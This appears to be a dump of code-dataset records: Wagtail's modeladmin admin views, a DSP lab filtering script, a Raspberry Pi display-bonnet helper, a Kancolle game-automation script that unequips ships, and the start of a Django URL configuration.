filter_specs = []\n if self.list_filter:\n for list_filter in self.list_filter:\n if callable(list_filter):\n # This is simply a custom list filter class.\n spec = list_filter(\n request, lookup_params, self.model, self.model_admin\n )\n else:\n field_path = None\n if isinstance(list_filter, (tuple, list)):\n # This is a custom FieldListFilter class for a given\n # field.\n field, field_list_filter_class = list_filter\n else:\n # This is simply a field name, so use the default\n # FieldListFilter class that has been registered for\n # the type of the given field.\n field = list_filter\n field_list_filter_class = FieldListFilter.create\n if not isinstance(field, models.Field):\n field_path = field\n field = get_fields_from_path(self.model, field_path)[-1]\n spec = field_list_filter_class(\n field,\n request,\n lookup_params,\n self.model,\n self.model_admin,\n field_path=field_path,\n )\n\n # Check if we need to use distinct()\n use_distinct = use_distinct or lookup_spawns_duplicates(\n self.opts, field_path\n )\n if spec and spec.has_output():\n filter_specs.append(spec)\n\n # At this point, all the parameters used by the various ListFilters\n # have been removed from lookup_params, which now only contains other\n # parameters passed via the query string. We now loop through the\n # remaining parameters both to ensure that all the parameters are valid\n # fields and to determine if at least one of them needs distinct(). If\n # the lookup parameters aren't real fields, then bail out.\n try:\n for key, value in lookup_params.items():\n lookup_params[key] = prepare_lookup_value(key, value)\n use_distinct = use_distinct or lookup_spawns_duplicates(self.opts, key)\n return (filter_specs, bool(filter_specs), lookup_params, use_distinct)\n except FieldDoesNotExist as e:\n raise IncorrectLookupParameters from e\n\n def get_query_string(self, new_params=None, remove=None):\n if new_params is None:\n new_params = {}\n if remove is None:\n remove = []\n p = self.params.copy()\n for r in remove:\n for k in list(p):\n if k.startswith(r):\n del p[k]\n for k, v in new_params.items():\n if v is None:\n if k in p:\n del p[k]\n else:\n p[k] = v\n return \"?%s\" % urlencode(sorted(p.items()))\n\n def _get_default_ordering(self):\n ordering = []\n if self.model_admin.ordering:\n ordering = self.model_admin.ordering\n elif self.opts.ordering:\n ordering = self.opts.ordering\n return ordering\n\n def get_default_ordering(self, request):\n if self.model_admin.get_ordering(request):\n return self.model_admin.get_ordering(request)\n if self.opts.ordering:\n return self.opts.ordering\n return ()\n\n def get_ordering_field(self, field_name):\n \"\"\"\n Returns the proper model field name corresponding to the given\n field_name to use for ordering. field_name may either be the name of a\n proper model field or the name of a method (on the admin or model) or a\n callable with the 'admin_order_field' attribute. Returns None if no\n proper model field name can be matched.\n \"\"\"\n try:\n field = self.opts.get_field(field_name)\n return field.name\n except FieldDoesNotExist:\n # See whether field_name is a name of a non-field\n # that allows sorting.\n if callable(field_name):\n attr = field_name\n elif hasattr(self.model_admin, field_name):\n attr = getattr(self.model_admin, field_name)\n else:\n attr = getattr(self.model, field_name)\n return getattr(attr, \"admin_order_field\", None)\n\n def get_ordering(self, request, queryset):\n \"\"\"\n Returns the list of ordering fields for the change list.\n First we check the get_ordering() method in model admin, then we check\n the object's default ordering. Then, any manually-specified ordering\n from the query string overrides anything. Finally, a deterministic\n order is guaranteed by ensuring the primary key is used as the last\n ordering field.\n \"\"\"\n params = self.params\n ordering = list(self.get_default_ordering(request))\n if self.ORDER_VAR in params:\n # Clear ordering and used params\n ordering = []\n order_params = params[self.ORDER_VAR].split(\".\")\n for p in order_params:\n try:\n none, pfx, idx = p.rpartition(\"-\")\n field_name = self.list_display[int(idx)]\n order_field = self.get_ordering_field(field_name)\n if not order_field:\n continue # No 'admin_order_field', skip it\n # reverse order if order_field has already \"-\" as prefix\n if order_field.startswith(\"-\") and pfx == \"-\":\n ordering.append(order_field[1:])\n else:\n ordering.append(pfx + order_field)\n except (IndexError, ValueError):\n continue # Invalid ordering specified, skip it.\n\n # Add the given query's ordering fields, if any.\n ordering.extend(queryset.query.order_by)\n\n # Ensure that the primary key is systematically present in the list of\n # ordering fields so we can guarantee a deterministic order across all\n # database backends.\n pk_name = self.opts.pk.name\n\n if not (set(ordering) & {\"pk\", \"-pk\", pk_name, \"-\" + pk_name}):\n # ordering isn't already being applied to pk\n ordering.append(\"-\" + pk_name)\n\n return ordering\n\n def get_ordering_field_columns(self):\n \"\"\"\n Returns an OrderedDict of ordering field column numbers and asc/desc\n \"\"\"\n\n # We must cope with more than one column having the same underlying\n # sort field, so we base things on column numbers.\n ordering = self._get_default_ordering()\n ordering_fields = OrderedDict()\n if self.ORDER_VAR not in self.params:\n # for ordering specified on model_admin or model Meta, we don't\n # know the right column numbers absolutely, because there might be\n # morr than one column associated with that ordering, so we guess.\n for field in ordering:\n if field.startswith(\"-\"):\n field = field[1:]\n order_type = \"desc\"\n else:\n order_type = \"asc\"\n for index, attr in enumerate(self.list_display):\n if self.get_ordering_field(attr) == field:\n ordering_fields[index] = order_type\n break\n else:\n for p in self.params[self.ORDER_VAR].split(\".\"):\n none, pfx, idx = p.rpartition(\"-\")\n try:\n idx = int(idx)\n except ValueError:\n continue # skip it\n ordering_fields[idx] = \"desc\" if pfx == \"-\" else \"asc\"\n return ordering_fields\n\n def get_queryset(self, request=None):\n request = request or self.request\n\n # First, we collect all the declared list filters.\n (\n self.filter_specs,\n self.has_filters,\n remaining_lookup_params,\n filters_use_distinct,\n ) = self.get_filters(request)\n\n # Then, we let every list filter modify the queryset to its liking.\n qs = self.get_base_queryset(request)\n for filter_spec in self.filter_specs:\n new_qs = filter_spec.queryset(request, qs)\n if new_qs is not None:\n qs = new_qs\n\n try:\n # Finally, we apply the remaining lookup parameters from the query\n # string (i.e. those that haven't already been processed by the\n # filters).\n if DJANGO_VERSION >= (5, 0):\n from django.contrib.admin.utils import (\n build_q_object_from_lookup_parameters,\n )\n\n qs = qs.filter(\n build_q_object_from_lookup_parameters(remaining_lookup_params)\n )\n else:\n qs = qs.filter(**remaining_lookup_params)\n except (SuspiciousOperation, ImproperlyConfigured):\n # Allow certain types of errors to be re-raised as-is so that the\n # caller can treat them in a special way.\n raise\n except Exception as e: # noqa: BLE001\n # Every other error is caught with a naked except, because we don't\n # have any other way of validating lookup parameters. They might be\n # invalid if the keyword arguments are incorrect, or if the values\n # are not in the correct type, so we might get FieldError,\n # ValueError, ValidationError, or ?.\n raise IncorrectLookupParameters(e)\n\n if not qs.query.select_related:\n qs = self.apply_select_related(qs)\n\n # Set ordering.\n ordering = self.get_ordering(request, qs)\n qs = qs.order_by(*ordering)\n\n # Remove duplicates from results, if necessary\n if filters_use_distinct:\n qs = qs.distinct()\n\n # Apply search results\n return self.get_search_results(request, qs, self.query)\n\n def apply_select_related(self, qs):\n if self.select_related is True:\n return qs.select_related()\n\n if self.select_related is False:\n if self.has_related_field_in_list_display():\n return qs.select_related()\n\n if self.select_related:\n return qs.select_related(*self.select_related)\n return qs\n\n def has_related_field_in_list_display(self):\n for field_name in self.list_display:\n try:\n field = self.opts.get_field(field_name)\n except FieldDoesNotExist:\n pass\n else:\n if isinstance(field, models.ManyToOneRel):\n return True\n return False\n\n def get_context_data(self, **kwargs):\n user = self.request.user\n all_count = self.get_base_queryset().count()\n queryset = self.get_queryset()\n result_count = queryset.count()\n paginator = Paginator(queryset, self.items_per_page)\n\n try:\n page_obj = paginator.page(self.page_num + 1)\n except InvalidPage:\n page_obj = paginator.page(1)\n\n context = {\n \"view\": self,\n \"all_count\": all_count,\n \"result_count\": result_count,\n \"paginator\": paginator,\n \"page_obj\": page_obj,\n \"object_list\": page_obj.object_list,\n \"user_can_create\": self.permission_helper.user_can_create(user),\n \"show_search\": self.search_handler.show_search_form,\n }\n\n if self.is_pagemodel:\n models = self.model.allowed_parent_page_models()\n allowed_parent_types = [m._meta.verbose_name for m in models]\n valid_parents = self.permission_helper.get_valid_parent_pages(user)\n valid_parent_count = valid_parents.count()\n context.update(\n {\n \"no_valid_parents\": not valid_parent_count,\n \"required_parent_types\": allowed_parent_types,\n }\n )\n\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def get_template_names(self):\n return self.model_admin.get_index_template()\n\n\nclass CreateView(ModelFormView):\n page_title = gettext_lazy(\"New\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_create(user)\n\n def dispatch(self, request, *args, **kwargs):\n if self.is_pagemodel:\n user = request.user\n parents = self.permission_helper.get_valid_parent_pages(user)\n parent_count = parents.count()\n\n # There's only one available parent for this page type for this\n # user, so we send them along with that as the chosen parent page\n if parent_count == 1:\n parent = parents.get()\n parent_pk = quote(parent.pk)\n return redirect(\n self.url_helper.get_action_url(\n \"add\", self.app_label, self.model_name, parent_pk\n )\n )\n\n # The page can be added in multiple places, so redirect to the\n # choose_parent view so that the parent can be specified\n return redirect(self.url_helper.get_action_url(\"choose_parent\"))\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model, TranslatableMixin\n ):\n selected_locale = self.request.GET.get(\"locale\")\n if selected_locale:\n locale = get_object_or_404(Locale, language_code=selected_locale)\n else:\n locale = Locale.get_default()\n\n kwargs.update(\n {\n \"locale\": locale,\n \"translations\": [\n {\n \"locale\": locale,\n \"url\": self.create_url + \"?locale=\" + locale.language_code,\n }\n for locale in Locale.objects.all().exclude(id=locale.id)\n ],\n }\n )\n\n return super().dispatch(request, *args, **kwargs)\n\n def form_valid(self, form):\n response = super().form_valid(form)\n revision = None\n\n # Save revision if the model inherits from RevisionMixin\n if isinstance(self.instance, RevisionMixin):\n revision = self.instance.save_revision(user=self.request.user)\n\n log(\n instance=self.instance,\n action=\"wagtail.create\",\n revision=revision,\n content_changed=True,\n )\n return response\n\n def get_meta_title(self):\n return _(\"Create new %(object)s\") % {\"object\": self.verbose_name}\n\n def get_page_subtitle(self):\n return capfirst(self.verbose_name)\n\n def get_template_names(self):\n return self.model_admin.get_create_template()\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model, TranslatableMixin\n ):\n selected_locale = self.request.GET.get(\"locale\")\n if selected_locale:\n kwargs[\"instance\"].locale = get_object_or_404(\n Locale, language_code=selected_locale\n )\n\n return kwargs\n\n\nclass EditView(ModelFormView, InstanceSpecificView):\n page_title = gettext_lazy(\"Editing\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_edit_obj(user, self.instance)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if self.is_pagemodel:\n return redirect(self.url_helper.get_action_url(\"edit\", self.pk_quoted))\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model, TranslatableMixin\n ):\n translations = []\n for translation in self.instance.get_translations().select_related(\n \"locale\"\n ):\n locale = translation.locale\n url = (\n self.url_helper.get_action_url(\"edit\", translation.pk)\n + \"?locale=\"\n + locale.language_code\n )\n translations.append({\"locale\": locale, \"url\": url})\n\n if translations:\n kwargs.update(\n {\n \"locale\": self.locale,\n \"translations\": translations,\n }\n )\n\n return super().dispatch(request, *args, **kwargs)\n\n def get_meta_title(self):\n return _(\"Editing %(object)s\") % {\"object\": self.verbose_name}\n\n def get_success_message(self, instance):\n return _(\"%(model_name)s '%(object)s' updated.\") % {\n \"model_name\": capfirst(self.verbose_name),\n \"object\": instance,\n }\n\n def get_context_data(self, **kwargs):\n context = {\n \"user_can_delete\": self.permission_helper.user_can_delete_obj(\n self.request.user, self.instance\n )\n }\n context.update(kwargs)\n if self.model_admin.history_view_enabled:\n context[\"latest_log_entry\"] = log_registry.get_logs_for_instance(\n self.instance\n ).first()\n context[\"history_url\"] = self.url_helper.get_action_url(\n \"history\", quote(self.instance.pk)\n )\n else:\n context[\"latest_log_entry\"] = None\n context[\"history_url\"] = None\n\n return super().get_context_data(**context)\n\n def get_error_message(self):\n name = self.verbose_name\n return _(\"The %(object)s could not be saved due to errors.\") % {\"object\": name}\n\n def get_template_names(self):\n return self.model_admin.get_edit_template()\n\n def form_valid(self, form):\n response = super().form_valid(form)\n revision = None\n\n self.has_content_changes = form.has_changed()\n\n # Save revision if the model inherits from RevisionMixin\n if isinstance(self.instance, RevisionMixin):\n revision = self.instance.save_revision(\n user=self.request.user,\n changed=self.has_content_changes,\n )\n\n log(\n instance=self.instance,\n action=\"wagtail.edit\",\n revision=revision,\n content_changed=self.has_content_changes,\n )\n return response\n\n\nclass ChooseParentView(WMABaseView):\n def dispatch(self, request, *args, **kwargs):\n if not self.permission_helper.user_can_create(request.user):\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_page_title(self):\n return _(\"Add %(object)s\") % {\"object\": self.verbose_name}\n\n def get_form(self, request):\n parents = self.permission_helper.get_valid_parent_pages(request.user)\n return ParentChooserForm(parents, request.POST or None)\n\n def get(self, request, *args, **kwargs):\n form = self.get_form(request)\n context = self.get_context_data(form=form)\n return self.render_to_response(context)\n\n def post(self, request, *args, **kargs):\n form = self.get_form(request)\n if form.is_valid():\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def form_valid(self, form):\n parent_pk = quote(form.cleaned_data[\"parent_page\"].pk)\n return redirect(\n self.url_helper.get_action_url(\n \"add\", self.app_label, self.model_name, parent_pk\n )\n )\n\n def form_invalid(self, form):\n context = self.get_context_data(form=form)\n return self.render_to_response(context)\n\n def get_template_names(self):\n return self.model_admin.get_choose_parent_template()\n\n\nclass DeleteView(InstanceSpecificView):\n page_title = gettext_lazy(\"Delete\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_delete_obj(user, self.instance)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if not self.check_action_permitted(request.user):\n raise PermissionDenied\n if self.is_pagemodel:\n return redirect(self.url_helper.get_action_url(\"delete\", self.pk_quoted))\n return super().dispatch(request, *args, **kwargs)\n\n def get_meta_title(self):\n return _(\"Confirm deletion of %(object)s\") % {\"object\": self.verbose_name}\n\n def confirmation_message(self):\n return _(\n \"Are you sure you want to delete this %(object)s? If other things in your \"\n \"site are related to it, they may also be affected.\"\n ) % {\"object\": self.verbose_name}\n\n def delete_instance(self):\n self.instance.delete()\n\n def post(self, request, *args, **kwargs):\n try:\n msg = _(\"%(model_name)s '%(object)s' deleted.\") % {\n \"model_name\": self.verbose_name,\n \"object\": self.instance,\n }\n with transaction.atomic():\n log(instance=self.instance, action=\"wagtail.delete\")\n self.delete_instance()\n messages.success(request, msg)\n return redirect(self.index_url)\n except models.ProtectedError:\n linked_objects = []\n fields = self.model._meta.fields_map.values()\n fields = (\n obj for obj in fields if not isinstance(obj.field, ManyToManyField)\n )\n for rel in fields:\n if rel.on_delete == models.PROTECT:\n if isinstance(rel, OneToOneRel):\n try:\n obj = getattr(self.instance, rel.get_accessor_name())\n except ObjectDoesNotExist:\n pass\n else:\n linked_objects.append(obj)\n else:\n qs = getattr(self.instance, rel.get_accessor_name())\n for obj in qs.all():\n linked_objects.append(obj)\n context = self.get_context_data(\n protected_error=True, linked_objects=linked_objects\n )\n return self.render_to_response(context)\n\n def get_template_names(self):\n return self.model_admin.get_delete_template()\n\n\nclass InspectView(InstanceSpecificView):\n\n page_title = gettext_lazy(\"Inspecting\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_inspect_obj(user, self.instance)\n\n def dispatch(self, request, *args, **kwargs):\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model_admin.model, TranslatableMixin\n ):\n translations = []\n for translation in self.instance.get_translations().select_related(\n \"locale\"\n ):\n locale = translation.locale\n url = (\n self.url_helper.get_action_url(\"inspect\", translation.pk)\n + \"?locale=\"\n + locale.language_code\n )\n translations.append({\"locale\": locale, \"url\": url})\n\n if translations:\n kwargs.update(\n {\n \"locale\": self.locale,\n \"translations\": translations,\n }\n )\n\n return super().dispatch(request, *args, **kwargs)\n\n @property\n def media(self):\n return forms.Media(\n css={\"all\": self.model_admin.get_inspect_view_extra_css()},\n js=self.model_admin.get_inspect_view_extra_js(),\n )\n\n def get_meta_title(self):\n return _(\"Inspecting %(object)s\") % {\"object\": self.verbose_name}\n\n def get_field_label(self, field_name, field=None):\n \"\"\"Return a label to display for a field\"\"\"\n return label_for_field(field_name, model=self.model)\n\n def get_field_display_value(self, field_name, field=None):\n \"\"\"Return a display value for a field/attribute\"\"\"\n\n # First we check for a 'get_fieldname_display' property/method on\n # the model, and return the value of that, if present.\n val_funct = getattr(self.instance, \"get_%s_display\" % field_name, None)\n if val_funct is not None:\n if callable(val_funct):\n return val_funct()\n return val_funct\n\n # Now let's get the attribute value from the instance itself and see if\n # we can render something useful. raises AttributeError appropriately.\n val = getattr(self.instance, field_name)\n\n if isinstance(val, models.Manager):\n val = val.all()\n\n if isinstance(val, models.QuerySet):\n if val.exists():\n return \", \".join([\"%s\" % obj for obj in val])\n return self.model_admin.get_empty_value_display(field_name)\n\n # wagtail.images might not be installed\n try:\n from wagtail.images.models import AbstractImage\n\n if isinstance(val, AbstractImage):\n # Render a rendition of the image\n return self.get_image_field_display(field_name, field)\n except RuntimeError:\n pass\n\n # wagtail.wagtaildocuments might not be installed\n try:\n from wagtail.documents.models import AbstractDocument\n\n if isinstance(val, AbstractDocument):\n # Render a link to the document\n return self.get_document_field_display(field_name, field)\n except RuntimeError:\n pass\n\n # Resort to returning the real value or 'empty value'\n if val or val is False:\n return val\n return self.model_admin.get_empty_value_display(field_name)\n\n def get_image_field_display(self, field_name, field):\n \"\"\"Render an image\"\"\"\n from wagtail.images.shortcuts import get_rendition_or_not_found\n\n image = getattr(self.instance, field_name)\n if image:\n return get_rendition_or_not_found(image, \"max-400x400\").img_tag\n return self.model_admin.get_empty_value_display(field_name)\n\n def get_document_field_display(self, field_name, field):\n \"\"\"Render a link to a document\"\"\"\n document = getattr(self.instance, field_name)\n if document:\n return format_html(\n '<a href=\"{}\">{} <span class=\"meta\">({}, {})</span></a>',\n document.url,\n document.title,\n document.file_extension.upper(),\n filesizeformat(document.file.size),\n )\n return self.model_admin.get_empty_value_display(field_name)\n\n def get_dict_for_field(self, field_name):\n \"\"\"\n Return a dictionary containing `label` and `value` values to display\n for a field.\n \"\"\"\n try:\n field = self.model._meta.get_field(field_name)\n except FieldDoesNotExist:\n field = None\n return {\n \"label\": self.get_field_label(field_name, field),\n \"value\": self.get_field_display_value(field_name, field),\n }\n\n def get_fields_dict(self):\n \"\"\"\n Return a list of `label`/`value` dictionaries to represent the\n fields named by the model_admin class's `get_inspect_view_fields` method\n \"\"\"\n fields = []\n for field_name in self.model_admin.get_inspect_view_fields():\n fields.append(self.get_dict_for_field(field_name))\n return fields\n\n def get_context_data(self, **kwargs):\n context = {\n \"fields\": self.get_fields_dict(),\n \"buttons\": self.button_helper.get_buttons_for_obj(\n self.instance, exclude=[\"inspect\"]\n ),\n }\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def get_template_names(self):\n return self.model_admin.get_inspect_template()\n\n\nclass HistoryView(MultipleObjectMixin, WagtailAdminTemplateMixin, InstanceSpecificView):\n page_title = gettext_lazy(\"History\")\n paginate_by = 50\n columns = [\n Column(\"message\", label=gettext_lazy(\"Action\")),\n UserColumn(\"user\", blank_display_name=\"system\"),\n DateColumn(\"timestamp\", label=gettext_lazy(\"Date\")),\n ]\n\n def get_page_subtitle(self):\n return str(self.instance)\n\n def get_template_names(self):\n return self.model_admin.get_history_template()\n\n def get_queryset(self):\n return log_registry.get_logs_for_instance(self.instance).prefetch_related(\n \"user__wagtail_userprofile\"\n )\n\n def get_context_data(self, **kwargs):\n self.object_list = self.get_queryset()\n context = super().get_context_data(**kwargs)\n index_url = self.url_helper.get_action_url(\"history\", quote(self.instance.pk))\n table = Table(\n self.columns,\n context[\"object_list\"],\n base_url=index_url,\n ordering=self.get_ordering(),\n )\n\n context[\"table\"] = table\n context[\"media\"] = table.media\n context[\"index_url\"] = index_url\n context[\"is_paginated\"] = True\n return context\n","repo_name":"wagtail/wagtail","sub_path":"wagtail/contrib/modeladmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44351,"program_lang":"python","lang":"en","doc_type":"code","stars":16307,"dataset":"github-code","pt":"95"} +{"seq_id":"38114674365","text":"# DSP first lab 6 part 2\n# 08/05/2017\n\nimport numpy as np\nfrom numpy import cos, exp, abs, angle # function\nfrom numpy import pi # constant\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom scipy import signal\n\nplt_n = 0 # for plotting figure increment only\n\nmat = scipy.io.loadmat('files\\LAB6DAT.MAT') # load matlab file\n\nprint(\"Available keys in mat file:\")\nprint(mat.keys()) # print all the avaiable keys from mat file; dict_keys(['h2', 'xtv', 'x2', 'h1', 'x1'])\n# print(mat['x1']) # access stored data with a key\n\n# 2.1 (b) polynomial multiplication\np1 = [0, 1, 1/2, -2] # 1st polynomial\np2 = [1, 1, 0, -1/4] # 2nd polynomial\n\np3 = signal.convolve(p1, p2) # convolve = polynomial multiplication = digital filtering\nprint(\"Polynomial Multiplication: \")\nprint(p3) # check result against hand calculation\n\n# 2.1 (c) frequency response of two cascaded system\nFIR1 = [1/3, 1/3, 1/3, 0, 0] # 3-point average filter\nFIR2 = [1/5, 1/5, 1/5, 1/5, 1/5] # 5-point average filter\n\nFIR3 = signal.convolve(FIR1, FIR2) # cascade two systems\nprint(\"Cascaded FIR filter: \")\nprint(FIR3)\n\nww_start = -3*pi # extend the normalized frequency range beyond -pi to verify the periodicity of frequency response\nww_end = 3*pi # extend the normalized frequency range beyond +pi to verify the periodicity of frequency response\nww_sample_size = 400\nww_step = (ww_end-ww_start)/ww_sample_size\nww = np.arange(ww_start, ww_end, ww_step) # arange(start, stop, step); exclusive of ending\n\nW, H = signal.freqz(FIR3, 1, ww) # (numerator, denominator, frequency range)\n\nH_mag = np.abs(H) # linear scale\nH_phase = np.angle(H, deg=True) # angle in degree\n\nfig = plt.figure(plt_n, figsize=(12, 12), dpi=80, facecolor='w', edgecolor='k')\nfig.suptitle(\"Cascaded FIR filter frequency response\")\n\nax1 = plt.subplot(211)\nax1.set_xlim(ww_start, ww_end)\nax1.set_ylim(0, max(H_mag))\n# ax1.set_xticks(np.arange(ww_start, ww_end, plt_ww_tick))\nax1.set_xlabel('normalized frequency (2*pi*f0/fs)')\nax1.set_ylabel('|H|')\nax1.plot(W, H_mag, 'r--')\nax1.set_title('magnitude response')\n\nax2 = plt.subplot(212)\nax2.set_xlim(ww_start, ww_end)\nax2.set_ylim(-180, 180)\nax2.set_xlabel('normalized frequency (2*pi*f0/fs)')\nax2.set_ylabel('angle(H) in deg')\nax2.plot(W, H_phase, 'b--')\nax2.set_title('phase response')\n\nplt.subplots_adjust(left=0.1, right=0.9, top=0.9, bottom=0.1, hspace=0.3, wspace=0)\n\nplt.show()\n","repo_name":"hongpan0507/Programming","sub_path":"Python/pycharm/DSP_first/Lab6/DSP_first_lab6_part2.py","file_name":"DSP_first_lab6_part2.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72529349433","text":"class Bonnet():\n def __init__(self, setupDisplay=False, width=240, height=240, rotation=180):\n self.height = height\n self.width = width\n self.rotation = rotation\n self.display = None\n self.buttons = {}\n self.setup(setupDisplay=setupDisplay)\n\n # Setup the Display and get a display object\n def setup(self, setupDisplay):\n if setupDisplay:\n import board\n from digitalio import DigitalInOut, Direction\n import adafruit_rgb_display.st7789 as st7789\n\n print(\"Setting up Adafruit st7789 driver...\")\n # Create the display\n cs_pin = DigitalInOut(board.CE0)\n dc_pin = DigitalInOut(board.D25)\n reset_pin = DigitalInOut(board.D24)\n BAUDRATE = 24000000\n\n spi = board.SPI()\n self.display = st7789.ST7789(\n spi,\n width=self.width,\n height=self.height,\n y_offset=80,\n rotation=self.rotation,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE\n )\n # Get the Adafruit 1.3\" TFT Bonnet Buttons\n # Input pins:\n button_A = DigitalInOut(board.D5)\n button_A.direction = Direction.INPUT\n\n button_B = DigitalInOut(board.D6)\n button_B.direction = Direction.INPUT\n\n button_L = DigitalInOut(board.D27)\n button_L.direction = Direction.INPUT\n\n button_R = DigitalInOut(board.D23)\n button_R.direction = Direction.INPUT\n\n button_U = DigitalInOut(board.D17)\n button_U.direction = Direction.INPUT\n\n button_D = DigitalInOut(board.D22)\n button_D.direction = Direction.INPUT\n\n button_C = DigitalInOut(board.D4)\n button_C.direction = Direction.INPUT\n\n self.buttons['A'] = button_A\n self.buttons['B'] = button_B\n self.buttons['LEFT'] = button_L\n self.buttons['RIGHT'] = button_R\n self.buttons['UP'] = button_U\n self.buttons['DOWN'] = button_D\n self.buttons['STICK'] = button_C \n else:\n print(\"Not using Adafruit Driver.\")\n\n def enableBacklight(self, onOff=True):\n # Turn on the Backlight\n if self.display:\n backlight = DigitalInOut(board.D26)\n backlight.switch_to_output()\n backlight.value = onOff\n else:\n print(\"No display setup. Unable to setup backlight.\")\n","repo_name":"antiero/pyowl","sub_path":"display_helpers.py","file_name":"display_helpers.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"705186129","text":"# -*- coding:utf-8 -*-\r\n\r\n\"\"\"\r\n功能:\r\n\t卸下所有在船上的装备。\r\n\r\n使用方法:\r\n\t独立执行(使用“在新线程执行脚本文件”按钮)。\r\n\r\n注意事项:\r\n\t在远征和在入渠的船只能卸下补强增设的装备。\r\n\t这个脚本不负责卸下基地航空队里的装备。\r\n\t如果有独占模式的配置正在执行,则会在其执行完毕后拆除装备。\r\n\t点击“终止当前任务”按钮可以停下来。\r\n\t这是很简易的脚本,没有错误处理部分,如果遇到了问题就再执行一遍吧\r\n\r\n已知问题:\r\n\t好像改装功能在选择不在任意舰队的船时,选船好像有点问题,有时会卡住。这功能之前也没啥用,所以也没人在意实际好不好用。\r\n\t\t总之这个python脚本本身是没问题的,所以就发出来了。\r\n\r\n更新记录:\r\n\t20221113 - 1.1\r\n\t\t适配新API\r\n\t20210614 - 1.0\r\n\t\t初始版本。\r\n\"\"\"\r\n\r\nfrom KancollePlayerSimulatorKaiCore import *\r\n\r\nrefreshDataTask = RefreshDataTask()\r\nrefreshDataTask.Priority += 2 # 比默认高两点的优先级\r\nUtility.AddTask(refreshDataTask) # ���刷新一下数据\r\n\r\nslots = (\r\n\tEquipmentSlot.Slot1,\r\n\tEquipmentSlot.Slot2,\r\n\tEquipmentSlot.Slot3,\r\n\tEquipmentSlot.Slot4,\r\n\tEquipmentSlot.Slot5,\r\n\tEquipmentSlot.SlotEx,\r\n)\r\n\r\nshipsState = GameState.Ships() # 优化:避免重复获取状态,所有用到此变量的地方也可以留空,但会每次获取,影响效率\r\nequipsState = GameState.Equips() # 优化:避免重复获取状态,所有用到此变量的地方也可以留空,但会每次获取,影响效率\r\nfleetsState = GameState.Fleets() # 优化:避免重复获取状态,所有用到此变量的地方也可以留空,但会每次获取,影响效率\r\nrepairsState = GameState.Repairs() # 优化:避免重复获取状态,所有用到此变量的地方也可以留空,但会每次获取,影响效率\r\n\r\nshipObjs = ShipUtility.All(shipsState)\r\nsortedShipObjs = ShipUtility.SortByLevel(shipObjs) # 优化:按等级顺序执行\r\nsortedShipObjs = list(sortedShipObjs) # 转成list\r\nsortedShipObjs.reverse() # 从低等级到高等级\r\nfor shipObj in sortedShipObjs:\r\n\t#if not ShipUtility.ShipLocked(shipObj): # 跳过没有上锁的船\r\n\t#\tcontinue\r\n\tequipIds = ShipUtility.AllEquipments(shipObj)\r\n\tif len(list(equipIds)) == 0: # 跳过没装备的船\r\n\t\tcontinue\r\n\texpeditioning = ShipUtility.Expeditioning(shipObj, fleetsState)\r\n\tdocking = ShipUtility.Docking(shipObj, repairsState) # ShipUtility.Repairing()会检查修复结束时间,此处不适用\r\n\tif (expeditioning or docking) and ShipUtility.ExtraEquipment(shipObj) == 0: # 跳过补强增设里没装备的远征或者入渠船\r\n\t\tcontinue\r\n\tshipId = ShipUtility.Id(shipObj)\r\n\tshipReadable = ShipUtility.HumanReadable(shipObj)\r\n\ttarget = {}\r\n\tif expeditioning or docking:\r\n\t\ttarget[EquipmentSlot.SlotEx] = 0\r\n\telse:\r\n\t\tfor slot in slots:\r\n\t\t\tif ShipUtility.SlotAvailable(shipObj, slot): # 仅添加存在的装备槽,否则会在检查阶段终止执行\r\n\t\t\t\ttarget[slot] = 0\r\n\trefitTask = SimpleRefitEquipmentTask(shipId, target, shipsState, equipsState)\r\n\trefitTask.Priority += 1 # 比默认高一点的优先级\r\n\tUtility.AddTask(refitTask)\r\n\r\nreturnTask = ReturnRoomTask() # 最后再返回母港\r\nUtility.AddTask(returnTask)\r\n","repo_name":"KanaHayama/KanCollePlayerSimulator","sub_path":"肝帝模拟 改/Python脚本/独立/卸下所有船上装备.py","file_name":"卸下所有船上装备.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"zh","doc_type":"code","stars":68,"dataset":"github-code","pt":"95"} +{"seq_id":"4803707656","text":"from django.urls import path\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nfrom .views import (\r\n\r\n\tRegisterPageView,\r\n\tLoginPageView,\r\n\tlogoutUser,\r\n\thomePageView,\r\n\tArticleListView,\r\n\tAuthorListView,\r\n\tAuthorView,\r\n\tArticleView,\r\n\tCreateArticleView,\r\n\tUpdateArticleView,\r\n\tDeleteArticleView,\r\n\tdeleteComment,\r\n)\r\n\r\nurlpatterns = [\r\n\t\r\n\t\r\n\tpath('register/', RegisterPageView.as_view(), name='register-page'),\r\n\tpath('login/', LoginPageView.as_view(), name='login-page'),\r\n\t\r\n\tpath('logout/', logoutUser, name='logout-page'),\r\n\t\r\n\tpath('', homePageView.as_view(), name='home-page'),\r\n\t\r\n\tpath('author/', AuthorListView.as_view(), name='authors-page'),\r\n\tpath('author/<int:id>', AuthorView.as_view(), name='author-page'),\r\n\r\n\tpath('article/<int:id>', ArticleView.as_view(), name='article-page'),\r\n\t\r\n\tpath('article/', 